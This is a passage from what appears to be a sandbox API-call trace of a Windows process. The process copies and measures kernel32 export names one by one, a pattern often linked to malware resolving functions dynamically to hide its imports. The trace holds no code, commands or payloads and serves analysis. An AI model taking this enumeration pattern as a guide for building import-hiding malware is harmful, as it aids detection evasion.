(lpString="COPYCONTEXT") returned 11 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.140] lstrlenA (lpString="COPYFILEA") returned 9 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.140] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.141] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.141] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.141] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.141] lstrlenA (lpString="COPYFILEW") returned 9 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.141] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.141] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.141] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.141] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.141] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.141] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.141] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.141] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.141] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.141] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.141] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.141] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.141] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.141] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.141] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.141] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.142] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.142] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.142] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.142] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.142] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.142] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.142] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.142] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.142] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.142] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.142] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.142] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.142] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.142] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.142] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.142] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.142] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.142] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.142] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.142] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.143] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.143] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.143] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.143] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.143] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.143] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.143] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.143] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.144] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.144] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.144] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.144] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.144] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.144] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.144] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.144] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.144] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.144] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.144] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.144] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.144] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.144] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.144] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.144] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.144] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.144] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.144] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.145] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.145] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.145] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.145] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.145] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.145] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.145] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.145] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.145] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.145] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.145] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.145] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.145] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.145] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.145] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.145] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.145] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.145] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.145] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.146] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.146] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.146] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.146] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.146] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.146] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.146] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.146] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.146] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.146] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.146] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.146] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.146] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.146] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.146] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.146] lstrlenA (lpString="DELETEATOM") returned 10 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.146] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.146] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.146] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.147] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.147] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.147] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.147] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.147] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.147] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.147] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.147] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.147] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.147] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.147] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.147] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.147] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.147] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.147] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.147] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.147] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.147] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.147] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.147] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.148] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.148] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.148] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.148] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.148] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.148] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.148] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.148] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.148] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.148] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.148] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.148] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.148] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.148] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.148] 